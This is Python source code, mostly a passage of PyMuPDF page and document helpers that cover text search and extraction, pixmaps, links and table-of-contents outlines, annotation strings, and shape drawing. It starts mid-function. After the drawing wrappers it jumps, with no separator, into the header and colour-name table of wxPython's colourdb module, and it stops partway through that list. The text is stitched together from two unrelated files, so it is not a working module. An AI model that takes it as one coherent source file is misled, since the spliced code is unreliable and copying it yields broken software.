len(mat_list) if l == 0: # safeguard against unusual situations return Matrix() # the zero matrix mat = Matrix(1, 1) # concatenate encountered matrices to this one for m in reversed(mat_list): mat *= m return mat def lookup_matrix(page, item): """Return the transformation matrix for an image name. Args: :page: the PyMuPDF page object :item: an item of the list doc.getPageImageList(page.number, full=True). 
Returns: concatenated matrices preceeding the image invocation. Notes: We are looking up "/imgname Do" in the concatenated /contents of the page first. If not found, also look it up in the streams of any Form XObjects of the page. If still not found, return the zero matrix. """ doc = page.parent # get the PDF document imgname = item[7] # the image reference name stream_xref = item[-1] # the contents object to inspect if stream_xref == 0: # only look in the page's /Contents if not getattr(page, "is_cleaned", False): page._cleanContents() # sanitize image invocation matrices page.is_cleaned = True xref = page._getContents()[0] # the (only) contents object cont = doc._getXrefStream(xref) # the contents object return calc_matrix(cont, imgname) cont = doc._getXrefStream(stream_xref) # the contents object return calc_matrix(cont, imgname) mat = lookup_matrix(page, item) if not bool(mat): return Rect(1, 1, -1, -1) # return infinite rect if not found ctm = page._getTransformation() # page transformation matrix mat.preScale(1, -1) # fiddle the matrix mat.preTranslate(0, -1) # fiddle the matrix r = Rect(0, 0, 1, 1) * mat # the bbox in PDF coordinates return r * ctm # the bbox in MuPDF coordinates def searchFor(page, text, hit_max = 16, quads = False, flags=None): """ Search for a string on a page. Args: text: string to be searched for hit_max: maximum hits quads: return quads instead of rectangles Returns: a list of rectangles or quads, each containing one occurrence. """ CheckParent(page) if flags is None: flags = TEXT_PRESERVE_LIGATURES | TEXT_PRESERVE_WHITESPACE tp = page.getTextPage(flags) # create TextPage # return list of hitting reactangles rlist = tp.search(text, hit_max = hit_max, quads = quads) tp = None return rlist def searchPageFor(doc, pno, text, hit_max=16, quads=False, flags=None): """ Search for a string on a page. 
Args: pno: page number text: string to be searched for hit_max: maximum hits quads: return quads instead of rectangles Returns: a list of rectangles or quads, each containing an occurrence. """ return doc[pno].searchFor(text, hit_max = hit_max, quads = quads, flags=flags) def getTextBlocks(page, flags=None): """Return the text blocks on a page. Notes: Lines in a block are concatenated with line breaks. Args: flags: (int) control the amount of data parsed into the textpage. Returns: A list of the blocks. Each item contains the containing rectangle coordinates, text lines, block type and running block number. """ CheckParent(page) if flags is None: flags = TEXT_PRESERVE_LIGATURES | TEXT_PRESERVE_WHITESPACE tp = page.getTextPage(flags) l = [] tp.extractBLOCKS(l) del tp return l def getTextWords(page, flags=None): """Return the text words as a list with the bbox for each word. Args: flags: (int) control the amount of data parsed into the textpage. """ CheckParent(page) if flags is None: flags = TEXT_PRESERVE_LIGATURES | TEXT_PRESERVE_WHITESPACE tp = page.getTextPage(flags) l = [] tp.extractWORDS(l) del tp return l def getText(page, output="text", flags=None): """ Extract a document page's text. Args: output: (str) text, html, dict, json, rawdict, xhtml or xml. Returns: the output of TextPage methods extractText, extractHTML, extractDICT, extractJSON, extractRAWDICT, extractXHTML or etractXML respectively. Default and misspelling choice is "text". 
""" output = output.lower() if output == "words": return getTextWords(page, flags=flags) if output == "blocks": return getTextBlocks(page, flags=flags) CheckParent(page) # available output types formats = ("text", "html", "json", "xml", "xhtml", "dict", "rawdict") if output not in formats: output = "text" # choose which of them also include images in the TextPage images = (0, 1, 1, 0, 1, 1, 1) # controls image inclusion in text page f = formats.index(output) if flags is None: flags = TEXT_PRESERVE_LIGATURES | TEXT_PRESERVE_WHITESPACE if images[f] == 1: flags |= TEXT_PRESERVE_IMAGES tp = page.getTextPage(flags) # TextPage with or without images if f == 2: t = tp.extractJSON() elif f == 5: t = tp.extractDICT() elif f == 6: t = tp.extractRAWDICT() else: t = tp._extractText(f) del tp return t def getPageText(doc, pno, output="text"): """ Extract a document page's text by page number. Notes: Convenience function calling page.getText(). Args: pno: page number output: (str) text, html, dict, json, rawdict, xhtml or xml. Returns: output from page.TextPage(). """ return doc[pno].getText(output) def getPixmap(page, matrix=None, colorspace=csRGB, clip=None, alpha=False, annots=True): """Create pixmap of page. Args: matrix: Matrix for transformation (default: Identity). colorspace: (str/Colorspace) cmyk, rgb, gray - case ignored, default csRGB. clip: (irect-like) restrict rendering to this area. 
alpha: (bool) whether to include alpha channel annots: (bool) whether to also render annotations """ CheckParent(page) doc = page.parent if type(colorspace) is str: if colorspace.upper() == "GRAY": colorspace = csGRAY elif colorspace.upper() == "CMYK": colorspace = csCMYK else: colorspace = csRGB if colorspace.n not in (1, 3, 4): raise ValueError("unsupported colorspace") return page._makePixmap(doc, matrix, colorspace, alpha, annots, clip) def getPagePixmap(doc, pno, matrix=None, colorspace=csRGB, clip=None, alpha=False, annots=True, ): """Create pixmap of document page by page number. Notes: Convenience function calling page.getPixmap. Args: pno: (int) page number matrix: Matrix for transformation (default: Identity). colorspace: (str,Colorspace) rgb, rgb, gray - case ignored, default csRGB. clip: (irect-like) restrict rendering to this area. alpha: (bool) include alpha channel annots: (bool) also render annotations """ return doc[pno].getPixmap(matrix=matrix, colorspace=colorspace, clip=clip, alpha=alpha, annots=annots, ) def getLinkDict(ln): nl = {"kind": ln.dest.kind, "xref": 0} try: nl["from"] = ln.rect except: pass pnt = Point(0, 0) if ln.dest.flags & LINK_FLAG_L_VALID: pnt.x = ln.dest.lt.x if ln.dest.flags & LINK_FLAG_T_VALID: pnt.y = ln.dest.lt.y if ln.dest.kind == LINK_URI: nl["uri"] = ln.dest.uri elif ln.dest.kind == LINK_GOTO: nl["page"] = ln.dest.page nl["to"] = pnt if ln.dest.flags & LINK_FLAG_R_IS_ZOOM: nl["zoom"] = ln.dest.rb.x else: nl["zoom"] = 0.0 elif ln.dest.kind == LINK_GOTOR: nl["file"] = ln.dest.fileSpec.replace("\\", "/") nl["page"] = ln.dest.page if ln.dest.page < 0: nl["to"] = ln.dest.dest else: nl["to"] = pnt if ln.dest.flags & LINK_FLAG_R_IS_ZOOM: nl["zoom"] = ln.dest.rb.x else: nl["zoom"] = 0.0 elif ln.dest.kind == LINK_LAUNCH: nl["file"] = ln.dest.fileSpec.replace("\\", "/") elif ln.dest.kind == LINK_NAMED: nl["name"] = ln.dest.named else: nl["page"] = ln.dest.page return nl def getLinks(page): """Create a list of all links contained 
in a PDF page. Notes: see PyMuPDF ducmentation for details. """ CheckParent(page) ln = page.firstLink links = [] while ln: nl = getLinkDict(ln) #if nl["kind"] == LINK_GOTO: # if type(nl["to"]) is Point and nl["page"] >= 0: # doc = page.parent # target_page = doc[nl["page"]] # ctm = target_page._getTransformation() # point = nl["to"] * ctm # nl["to"] = point links.append(nl) ln = ln.next if len(links) > 0: linkxrefs = page._getLinkXrefs() if len(linkxrefs) == len(links): for i in range(len(linkxrefs)): links[i]["xref"] = linkxrefs[i] return links def getToC(doc, simple = True): """Create a table of contents. Args: simple: a bool to control output. Returns a list, where each entry consists of outline level, title, page number and link destination (if simple = False). For details see PyMuPDF's documentation. """ def recurse(olItem, liste, lvl): '''Recursively follow the outline item chain and record item information in a list.''' while olItem: if olItem.title: title = olItem.title else: title = " " if not olItem.isExternal: if olItem.uri: page = olItem.page + 1 else: page = -1 else: page = -1 if not simple: link = getLinkDict(olItem) liste.append([lvl, title, page, link]) else: liste.append([lvl, title, page]) if olItem.down: liste = recurse(olItem.down, liste, lvl+1) olItem = olItem.next return liste # check if document is open and not encrypted if doc.isClosed: raise ValueError("document closed") doc.initData() olItem = doc.outline if not olItem: return [] lvl = 1 liste = [] return recurse(olItem, liste, lvl) def getRectArea(*args): """Calculate area of rectangle.\nparameter is one of 'px' (default), 'in', 'cm', or 'mm'.""" rect = args[0] if len(args) > 1: unit = args[1] else: unit = "px" u = {"px": (1,1), "in": (1.,72.), "cm": (2.54, 72.), "mm": (25.4, 72.)} f = (u[unit][0] / u[unit][1])**2 return f * rect.width * rect.height def setMetadata(doc, m): """Set a PDF's metadata (/Info dictionary)\nm: dictionary like doc.metadata'.""" if doc.isClosed or doc.isEncrypted: 
raise ValueError("document closed or encrypted") if type(m) is not dict: raise ValueError("arg2 must be a dictionary") for k in m.keys(): if not k in ("author", "producer", "creator", "title", "format", "encryption", "creationDate", "modDate", "subject", "keywords"): raise ValueError("invalid dictionary key: " + k) d = "<</Author" d += getPDFstr(m.get("author", "none")) d += "/CreationDate" d += getPDFstr(m.get("creationDate", "none")) d += "/Creator" d += getPDFstr(m.get("creator", "none")) d += "/Keywords" d += getPDFstr(m.get("keywords", "none")) d += "/ModDate" d += getPDFstr(m.get("modDate", "none")) d += "/Producer" d += getPDFstr(m.get("producer", "none")) d += "/Subject" d += getPDFstr(m.get("subject", "none")) d += "/Title" d += getPDFstr(m.get("title", "none")) d += ">>" doc._setMetadata(d) doc.initData() return def getDestStr(xref, ddict): """ Calculate the PDF action string. Notes: Supports Link annotations and outline items (bookmarks). """ if not ddict: return "" str_goto = "/A<</S/GoTo/D[%i 0 R/XYZ %g %g %i]>>" str_gotor1 = "/A<</S/GoToR/D[%s /XYZ %s %s %s]/F<</F%s/UF%s/Type/Filespec>>>>" str_gotor2 = "/A<</S/GoToR/D%s/F<</F%s/UF%s/Type/Filespec>>>>" str_launch = "/A<</S/Launch/F<</F%s/UF%s/Type/Filespec>>>>" str_uri = "/A<</S/URI/URI%s>>" if type(ddict) in (int, float): dest = str_goto % (xref, 0, ddict, 0) return dest d_kind = ddict.get("kind", LINK_NONE) if d_kind == LINK_NONE: return "" if ddict["kind"] == LINK_GOTO: d_zoom = ddict.get("zoom", 0) to = ddict.get("to", Point(0, 0)) d_left, d_top = to dest = str_goto % (xref, d_left, d_top, d_zoom) return dest if ddict["kind"] == LINK_URI: dest = str_uri % (getPDFstr(ddict["uri"]),) return dest if ddict["kind"] == LINK_LAUNCH: fspec = getPDFstr(ddict["file"]) dest = str_launch % (fspec, fspec) return dest if ddict["kind"] == LINK_GOTOR and ddict["page"] < 0: fspec = getPDFstr(ddict["file"]) dest = str_gotor2 % (getPDFstr(ddict["to"]), fspec, fspec) return dest if ddict["kind"] == LINK_GOTOR and 
ddict["page"] >= 0: fspec = getPDFstr(ddict["file"]) dest = str_gotor1 % (ddict["page"], ddict["to"].x, ddict["to"].y, ddict["zoom"], fspec, fspec) return dest return "" def setToC(doc, toc): '''Create new outline tree (table of contents)\ntoc: a Python list of lists. Each entry must contain level, title, page and optionally top margin on the page.''' if doc.isClosed or doc.isEncrypted: raise ValueError("document closed or encrypted") if not doc.isPDF: raise ValueError("not a PDF") toclen = len(toc) # check toc validity ------------------------------------------------------ if type(toc) is not list: raise ValueError("arg2 must be a list") if toclen == 0: return len(doc._delToC()) pageCount = len(doc) t0 = toc[0] if type(t0) is not list: raise ValueError("arg2 must contain lists of 3 or 4 items") if t0[0] != 1: raise ValueError("hierarchy level of item 0 must be 1") for i in list(range(toclen-1)): t1 = toc[i] t2 = toc[i+1] if not -1 <= t1[2] <= pageCount: raise ValueError("row %i:page number out of range" % i) if (type(t2) is not list) or len(t2) < 3 or len(t2) > 4: raise ValueError("arg2 must contain lists of 3 or 4 items") if (type(t2[0]) is not int) or t2[0] < 1: raise ValueError("hierarchy levels must be int > 0") if t2[0] > t1[0] + 1: raise ValueError("row %i: hierarchy step is > 1" % i) # no formal errors in toc -------------------------------------------------- old_xrefs = doc._delToC() # del old outlines, get xref numbers old_xrefs = [] # force creation of new xrefs # prepare table of xrefs for new bookmarks xref = [0] + old_xrefs xref[0] = doc._getOLRootNumber() # entry zero is outline root xref# if toclen > len(old_xrefs): # too few old xrefs? 
for i in range((toclen - len(old_xrefs))): xref.append(doc._getNewXref()) # acquire new ones lvltab = {0:0} # to store last entry per hierarchy level #============================================================================== # contains new outline objects as strings - first one is outline root #============================================================================== olitems = [{"count":0, "first":-1, "last":-1, "xref":xref[0]}] #============================================================================== # build olitems as a list of PDF-like connnected dictionaries #============================================================================== for i in range(toclen): o = toc[i] lvl = o[0] # level title = getPDFstr(o[1]) # titel pno = min(doc.pageCount - 1, max(0, o[2] - 1)) # page number page = doc[pno] # load the page ictm = ~page._getTransformation() # get inverse transformation matrix top = Point(72, 36) * ictm # default top location dest_dict = {"to": top, "kind": LINK_GOTO} # fall back target if o[2] < 0: dest_dict["kind"] = LINK_NONE if len(o) > 3: # some target is specified if type(o[3]) in (int, float): # if number, make a point from it dest_dict["to"] = Point(72, o[3]) * ictm else: # if something else, make sure we have a dict dest_dict = o[3] if type(o[3]) is dict else dest_dict if "to" not in dest_dict: # target point not in dict? 
dest_dict["to"] = top # put default in else: # transform target to PDF coordinates point = dest_dict["to"] * ictm dest_dict["to"] = point d = {} d["first"] = -1 d["count"] = 0 d["last"] = -1 d["prev"] = -1 d["next"] = -1 d["dest"] = getDestStr(page.xref, dest_dict) d["top"] = dest_dict["to"] d["title"] = title d["parent"] = lvltab[lvl-1] d["xref"] = xref[i+1] lvltab[lvl] = i+1 parent = olitems[lvltab[lvl-1]] parent["count"] += 1 if parent["first"] == -1: parent["first"] = i+1 parent["last"] = i+1 else: d["prev"] = parent["last"] prev = olitems[parent["last"]] prev["next"] = i+1 parent["last"] = i+1 olitems.append(d) #============================================================================== # now create each ol item as a string and insert it in the PDF #============================================================================== for i, ol in enumerate(olitems): txt = "<<" if ol["count"] > 0: if i > 0: txt += "/Count -%i" % ol["count"] else: txt += "/Count %i" % ol["count"] try: txt += ol["dest"] except: pass try: if ol["first"] > -1: txt += "/First %i 0 R" % xref[ol["first"]] except: pass try: if ol["last"] > -1: txt += "/Last %i 0 R" % xref[ol["last"]] except: pass try: if ol["next"] > -1: txt += "/Next %i 0 R" % xref[ol["next"]] except: pass try: if ol["parent"] > -1: txt += "/Parent %i 0 R" % xref[ol["parent"]] except: pass try: if ol["prev"] > -1: txt += "/Prev %i 0 R" % xref[ol["prev"]] except: pass try: txt += "/Title" + ol["title"] except: pass if i == 0: # special: this is the outline root txt += "/Type/Outlines" txt += ">>" doc._updateObject(xref[i], txt) # insert the PDF object doc.initData() return toclen def do_links(doc1, doc2, from_page = -1, to_page = -1, start_at = -1): '''Insert links contained in copied page range into destination PDF. 
Parameter values **must** equal those of method insertPDF() - which must have been previously executed.''' #-------------------------------------------------------------------------- # define skeletons for /Annots object texts #-------------------------------------------------------------------------- annot_goto = "<</A<</S/GoTo/D[%i 0 R /XYZ %g %g 0]>>/Rect[%s]/Subtype/Link>>" annot_gotor = "<</A<</S/GoToR/D[%i /XYZ %g %g 0]/F<</F(%s)/UF(%s)/Type/Filespec>>>>/Rect[%s]/Subtype/Link>>" annot_gotor_n = "<</A<</S/GoToR/D(%s)/F(%s)>>/Rect[%s]/Subtype/Link>>" annot_launch = "<</A<</S/Launch/F<</F(%s)/UF(%s)/Type/Filespec>>>>/Rect[%s]/Subtype/Link>>" annot_uri = "<</A<</S/URI/URI(%s)>>/Rect[%s]/Subtype/Link>>" #-------------------------------------------------------------------------- # internal function to create the actual "/Annots" object string #-------------------------------------------------------------------------- def cre_annot(lnk, xref_dst, pno_src, ctm): """Create annotation object string for a passed-in link. 
""" r = lnk["from"] * ctm # rect in PDF coordinates rect = "%g %g %g %g" % tuple(r) if lnk["kind"] == LINK_GOTO: txt = annot_goto idx = pno_src.index(lnk["page"]) p = lnk["to"] * ctm # target point in PDF coordinates annot = txt % (xref_dst[idx], p.x, p.y, rect) elif lnk["kind"] == LINK_GOTOR: if lnk["page"] >= 0: txt = annot_gotor pnt = lnk.get("to", Point(0, 0)) # destination point if type(pnt) is not Point: pnt = Point(0, 0) annot = txt % (lnk["page"], pnt.x, pnt.y, lnk["file"], lnk["file"], rect) else: txt = annot_gotor_n to = getPDFstr(lnk["to"]) to = to[1:-1] f = lnk["file"] annot = txt % (to, f, rect) elif lnk["kind"] == LINK_LAUNCH: txt = annot_launch annot = txt % (lnk["file"], lnk["file"], rect) elif lnk["kind"] == LINK_URI: txt = annot_uri annot = txt % (lnk["uri"], rect) else: annot = "" return annot #-------------------------------------------------------------------------- # validate & normalize parameters if from_page < 0: fp = 0 elif from_page >= doc2.pageCount: fp = doc2.pageCount - 1 else: fp = from_page if to_page < 0 or to_page >= doc2.pageCount: tp = doc2.pageCount - 1 else: tp = to_page if start_at < 0: raise ValueError("'start_at' must be >= 0") sa = start_at incr = 1 if fp <= tp else -1 # page range could be reversed # lists of source / destination page numbers pno_src = list(range(fp, tp + incr, incr)) pno_dst = [sa + i for i in range(len(pno_src))] # lists of source / destination page xrefs xref_src = [] xref_dst = [] for i in range(len(pno_src)): p_src = pno_src[i] p_dst = pno_dst[i] old_xref = doc2._getPageObjNumber(p_src)[0] new_xref = doc1._getPageObjNumber(p_dst)[0] xref_src.append(old_xref) xref_dst.append(new_xref) # create the links for each copied page in destination PDF for i in range(len(xref_src)): page_src = doc2[pno_src[i]] # load source page links = page_src.getLinks() # get all its links if len(links) == 0: # no links there page_src = None continue ctm = ~page_src._getTransformation() # calc page transformation matrix 
page_dst = doc1[pno_dst[i]] # load destination page link_tab = [] # store all link definitions here for l in links: if l["kind"] == LINK_GOTO and (l["page"] not in pno_src): continue # GOTO link target not in copied pages annot_text = cre_annot(l, xref_dst, pno_src, ctm) if not annot_text: print("cannot create /Annot for kind: " + str(l["kind"])) else: link_tab.append(annot_text) if len(link_tab) > 0: page_dst._addAnnot_FromString(link_tab) page_dst = None page_src = None return def getLinkText(page, lnk): #-------------------------------------------------------------------------- # define skeletons for /Annots object texts #-------------------------------------------------------------------------- annot_goto = "<</A<</S/GoTo/D[%i 0 R/XYZ %g %g 0]>>/Rect[%s]/Subtype/Link>>" annot_goto_n = "<</A<</S/GoTo/D%s>>/Rect[%s]/Subtype/Link>>" annot_gotor = '''<</A<</S/GoToR/D[%i /XYZ %g %g 0]/F<</F(%s)/UF(%s)/Type/Filespec >>>>/Rect[%s]/Subtype/Link>>''' annot_gotor_n = "<</A<</S/GoToR/D%s/F(%s)>>/Rect[%s]/Subtype/Link>>" annot_launch = '''<</A<</S/Launch/F<</F(%s)/UF(%s)/Type/Filespec>> >>/Rect[%s]/Subtype/Link>>''' annot_uri = "<</A<</S/URI/URI(%s)>>/Rect[%s]/Subtype/Link>>" annot_named = "<</A<</S/Named/N/%s/Type/Action>>/Rect[%s]/Subtype/Link>>" ctm = page._getTransformation() ictm = ~ctm r = lnk["from"] height = page.rect.height rect = "%g %g %g %g" % tuple(r * ictm) annot = "" if lnk["kind"] == LINK_GOTO: if lnk["page"] >= 0: txt = annot_goto pno = lnk["page"] xref = page.parent._getPageXref(pno)[0] pnt = lnk.get("to", Point(0, 0)) # destination point ipnt = pnt * ictm annot = txt % (xref, ipnt.x, ipnt.y, rect) else: txt = annot_goto_n annot = txt % (getPDFstr(lnk["to"]), rect) elif lnk["kind"] == LINK_GOTOR: if lnk["page"] >= 0: txt = annot_gotor pnt = lnk.get("to", Point(0, 0)) # destination point if type(pnt) is not Point: pnt = Point(0, 0) annot = txt % (lnk["page"], pnt.x, pnt.y, lnk["file"], lnk["file"], rect) else: txt = annot_gotor_n annot = txt % 
(getPDFstr(lnk["to"]), lnk["file"], rect)
    elif lnk["kind"] == LINK_LAUNCH:
        txt = annot_launch
        annot = txt % (lnk["file"], lnk["file"], rect)
    elif lnk["kind"] == LINK_URI:
        txt = annot_uri
        annot = txt % (lnk["uri"], rect)
    elif lnk["kind"] == LINK_NAMED:
        txt = annot_named
        annot = txt % (lnk["name"], rect)
    return annot


def updateLink(page, lnk):
    """ Update a link on the current page.

    Builds the annotation source via getLinkText() and rewrites the
    existing link object identified by lnk["xref"].
    """
    CheckParent(page)
    annot = getLinkText(page, lnk)
    if annot == "":
        raise ValueError("link kind not supported")
    # overwrite the existing PDF object in place
    page.parent._updateObject(lnk["xref"], annot, page = page)
    return


def insertLink(page, lnk, mark = True):
    """ Insert a new link for the current page.

    The link dictionary is turned into annotation source by getLinkText()
    and appended to the page's annotations.
    NOTE(review): parameter 'mark' is accepted but never used here.
    """
    CheckParent(page)
    annot = getLinkText(page, lnk)
    if annot == "":
        raise ValueError("link kind not supported")
    page._addAnnot_FromString([annot])
    return


def insertTextbox(page, rect, buffer,
                  fontname="helv",
                  fontfile=None,
                  set_simple=0,
                  encoding=0,
                  fontsize=11,
                  color=None,
                  fill=None,
                  expandtabs=1,
                  align=0,
                  rotate=0,
                  render_mode=0,
                  border_width=1,
                  morph=None,
                  overlay=True):
    """ Insert text into a given rectangle.

    Notes:
        Creates a Shape object, uses its same-named method and commits it.
    Parameters:
        rect: (rect-like) area to use for text.
        buffer: text to be inserted
        fontname: a Base-14 font, font name or '/name'
        fontfile: name of a font file
        fontsize: font size
        color: RGB color triple
        expandtabs: handles tabulators with string function
        align: left, center, right, justified
        rotate: 0, 90, 180, or 270 degrees
        morph: morph box with a matrix and a pivotal point
        overlay: put text in foreground or background
    Returns: unused or deficit rectangle area (float)
    """
    img = page.newShape()
    rc = img.insertTextbox(rect, buffer,
                           fontsize=fontsize,
                           fontname=fontname,
                           fontfile=fontfile,
                           set_simple=set_simple,
                           encoding=encoding,
                           color=color,
                           fill=fill,
                           expandtabs=expandtabs,
                           render_mode=render_mode,
                           border_width=border_width,
                           align=align,
                           rotate=rotate,
                           morph=morph)
    # only commit (i.e. modify the page) if the text fully fitted
    if rc >= 0:
        img.commit(overlay)
    return rc


def insertText(page, point, text,
               fontsize=11,
               fontname="helv",
               fontfile=None,
               set_simple=0,
               encoding=0,
               color=None,
               fill=None,
               border_width=1,
               render_mode=0,
               rotate=0,
               morph=None,
               overlay=True):
    """Insert text on the page starting at 'point'.

    Thin wrapper: delegates to Shape.insertText() and commits the shape
    only when insertion succeeded (rc >= 0).
    """
    img = page.newShape()
    rc = img.insertText(point, text,
                        fontsize=fontsize,
                        fontname=fontname,
                        fontfile=fontfile,
                        set_simple=set_simple,
                        encoding=encoding,
                        color=color,
                        fill=fill,
                        border_width=border_width,
                        render_mode=render_mode,
                        rotate=rotate,
                        morph=morph)
    if rc >= 0:
        img.commit(overlay)
    return rc


def newPage(doc, pno=-1, width=595, height=842):
    """Create and return a new page object.

    Default width/height (595 x 842) is an A4 page in PDF points.
    """
    doc._newPage(pno, width=width, height=height)
    # pno == -1 appends, in which case doc[-1] is the new page as well
    return doc[pno]


def insertPage(
    doc,
    pno,
    text=None,
    fontsize=11,
    width=595,
    height=842,
    fontname="helv",
    fontfile=None,
    color=None,
):
    """ Create a new PDF page and insert some text.

    Notes:
        Function combining Document.newPage() and Page.insertText().
        For parameter details see these methods.
    Returns:
        0 if no text given, else the line count reported by insertText().
    """
    page = doc.newPage(pno=pno, width=width, height=height)
    if not bool(text):
        return 0
    # fixed insertion point (50, 72): one inch below the top-left corner
    rc = page.insertText(
        (50, 72),
        text,
        fontsize=fontsize,
        fontname=fontname,
        fontfile=fontfile,
        color=color,
    )
    return rc


def drawLine(page, p1, p2, color=None, dashes=None, width=1,
             lineCap=0, lineJoin=0, overlay=True, morph=None,
             roundcap=None):
    """Draw a line from point p1 to point p2.

    NOTE(review): this wrapper spells the parameter 'roundcap' (lower case)
    while all sibling wrappers use 'roundCap' — kept for call compatibility.
    """
    img = page.newShape()
    p = img.drawLine(Point(p1), Point(p2))
    img.finish(color=color, dashes=dashes, width=width, closePath=False,
               lineCap=lineCap, lineJoin=lineJoin, morph=morph,
               roundCap=roundcap)
    img.commit(overlay)
    return p


def drawSquiggle(page, p1, p2, breadth = 2, color=None, dashes=None,
                 width=1, lineCap=0, lineJoin=0, overlay=True, morph=None,
                 roundCap=None):
    """Draw a squiggly line from point p1 to point p2.
    """
    img = page.newShape()
    p = img.drawSquiggle(Point(p1), Point(p2), breadth = breadth)
    img.finish(color=color, dashes=dashes, width=width, closePath=False,
               lineCap=lineCap, lineJoin=lineJoin, morph=morph,
               roundCap=roundCap)
    img.commit(overlay)
    return p


def drawZigzag(page, p1, p2, breadth = 2, color=None, dashes=None,
               width=1, lineCap=0, lineJoin=0, overlay=True, morph=None,
               roundCap=None):
    """Draw a zigzag line from point p1 to point p2.
    """
    img = page.newShape()
    p = img.drawZigzag(Point(p1), Point(p2), breadth = breadth)
    img.finish(color=color, dashes=dashes, width=width, closePath=False,
               lineCap=lineCap, lineJoin=lineJoin, morph=morph,
               roundCap=roundCap)
    img.commit(overlay)
    return p


def drawRect(page, rect, color=None, fill=None, dashes=None, width=1,
             lineCap=0, lineJoin=0, morph=None, roundCap=None,
             overlay=True):
    """Draw a rectangle.
    """
    img = page.newShape()
    Q = img.drawRect(Rect(rect))
    img.finish(color=color, fill=fill, dashes=dashes, width=width,
               lineCap=lineCap, lineJoin=lineJoin, morph=morph,
               roundCap=roundCap)
    img.commit(overlay)
    return Q


def drawQuad(page, quad, color=None, fill=None, dashes=None, width=1,
             lineCap=0, lineJoin=0, morph=None, roundCap=None,
             overlay=True):
    """Draw a quadrilateral.
    """
    img = page.newShape()
    Q = img.drawQuad(Quad(quad))
    img.finish(color=color, fill=fill, dashes=dashes, width=width,
               lineCap=lineCap, lineJoin=lineJoin, morph=morph,
               roundCap=roundCap)
    img.commit(overlay)
    return Q


def drawPolyline(page, points, color=None, fill=None, dashes=None,
                 width=1, morph=None, lineCap=0, lineJoin=0, roundCap=None,
                 overlay=True, closePath=False):
    """Draw multiple connected line segments.
    """
    img = page.newShape()
    Q = img.drawPolyline(points)
    img.finish(color=color, fill=fill, dashes=dashes, width=width,
               lineCap=lineCap, lineJoin=lineJoin, morph=morph,
               roundCap=roundCap, closePath=closePath)
    img.commit(overlay)
    return Q


def drawCircle(page, center, radius, color=None, fill=None, morph=None,
               dashes=None, width=1, lineCap=0, lineJoin=0, roundCap=None,
               overlay=True):
    """Draw a circle given its center and radius.
    """
    img = page.newShape()
    Q = img.drawCircle(Point(center), radius)
    img.finish(color=color, fill=fill, dashes=dashes, width=width,
               lineCap=lineCap, lineJoin=lineJoin, morph=morph,
               roundCap=roundCap)
    img.commit(overlay)
    return Q


def drawOval(page, rect, color=None, fill=None, dashes=None, morph=None,
             roundCap=None, width=1, lineCap=0, lineJoin=0, overlay=True):
    """Draw an oval given its containing rectangle or quad.
    """
    img = page.newShape()
    Q = img.drawOval(rect)
    img.finish(color=color, fill=fill, dashes=dashes, width=width,
               lineCap=lineCap, lineJoin=lineJoin, morph=morph,
               roundCap=roundCap)
    img.commit(overlay)
    return Q


def drawCurve(page, p1, p2, p3, color=None, fill=None, dashes=None,
              width=1, morph=None, roundCap=None, closePath=False,
              lineCap=0, lineJoin=0, overlay=True):
    """Draw a special Bezier curve from p1 to p3, generating control
    points on lines p1 to p2 and p2 to p3.
    """
    img = page.newShape()
    Q = img.drawCurve(Point(p1), Point(p2), Point(p3))
    img.finish(color=color, fill=fill, dashes=dashes, width=width,
               lineCap=lineCap, lineJoin=lineJoin, morph=morph,
               roundCap=roundCap, closePath=closePath)
    img.commit(overlay)
    return Q


def drawBezier(page, p1, p2, p3, p4, color=None, fill=None, dashes=None,
               width=1, morph=None, roundCap=None, closePath=False,
               lineCap=0, lineJoin=0, overlay=True):
    """Draw a general cubic Bezier curve from p1 to p4 using control
    points p2 and p3.
    """
    img = page.newShape()
    Q = img.drawBezier(Point(p1), Point(p2), Point(p3), Point(p4))
    img.finish(color=color, fill=fill, dashes=dashes, width=width,
               lineCap=lineCap, lineJoin=lineJoin, morph=morph,
               roundCap=roundCap, closePath=closePath)
    img.commit(overlay)
    return Q


def drawSector(page, center, point, beta, color=None, fill=None,
               dashes=None, fullSector=True, morph=None, roundCap=None,
               width=1, closePath=False, lineCap=0, lineJoin=0,
               overlay=True):
    """ Draw a circle sector given circle center, one arc end point and
    the angle of the arc.

    Parameters:
        center -- center of circle
        point -- arc end point
        beta -- angle of arc (degrees)
        fullSector -- connect arc ends with center
    """
    img = page.newShape()
    Q = img.drawSector(Point(center), Point(point), beta,
                       fullSector=fullSector)
    img.finish(color=color, fill=fill, dashes=dashes, width=width,
               lineCap=lineCap, lineJoin=lineJoin, morph=morph,
               roundCap=roundCap, closePath=closePath)
    img.commit(overlay)
    return Q

#----------------------------------------------------------------------
# Name:        wx.lib.colourdb.py
# Purpose:     Adds a bunch of colour names and RGB values to the
#              colour database so they can be found by name
#
# Author:      Robin Dunn
#
# Created:     13-March-2001
# Copyright:   (c) 2001-2017 by Total Control Software
# Licence:     wxWindows license
# Tags:        phoenix-port, unittest, documented
#----------------------------------------------------------------------

def getColorList():
    """ Returns a list of just the colour names used by this module.

    :rtype: list of strings
    """
    return [ x[0] for x in getColorInfoList() ]


def getColorInfoList():
    """ Returns the list of colour name/value tuples used by this module.
:rtype: list of tuples """ return [ ("ALICEBLUE", 240, 248, 255), ("ANTIQUEWHITE", 250, 235, 215), ("ANTIQUEWHITE1", 255, 239, 219), ("ANTIQUEWHITE2", 238, 223, 204), ("ANTIQUEWHITE3", 205, 192, 176), ("ANTIQUEWHITE4", 139, 131, 120), ("AQUAMARINE", 127, 255, 212), ("AQUAMARINE1", 127, 255, 212), ("AQUAMARINE2", 118, 238, 198), ("AQUAMARINE3", 102, 205, 170), ("AQUAMARINE4", 69, 139, 116), ("AZURE", 240, 255, 255), ("AZURE1", 240, 255, 255), ("AZURE2", 224, 238, 238), ("AZURE3", 193, 205, 205), ("AZURE4", 131, 139, 139), ("BEIGE", 245, 245, 220), ("BISQUE", 255, 228, 196), ("BISQUE1", 255, 228, 196), ("BISQUE2", 238, 213, 183), ("BISQUE3", 205, 183, 158), ("BISQUE4", 139, 125, 107), ("BLACK", 0, 0, 0), ("BLANCHEDALMOND", 255, 235, 205), ("BLUE", 0, 0, 255), ("BLUE1", 0, 0, 255), ("BLUE2", 0, 0, 238), ("BLUE3", 0, 0, 205), ("BLUE4", 0, 0, 139), ("BLUEVIOLET", 138, 43, 226), ("BROWN", 165, 42, 42), ("BROWN1", 255, 64, 64), ("BROWN2", 238, 59, 59), ("BROWN3", 205, 51, 51), ("BROWN4", 139, 35, 35), ("BURLYWOOD", 222, 184, 135), ("BURLYWOOD1", 255, 211, 155), ("BURLYWOOD2", 238, 197, 145), 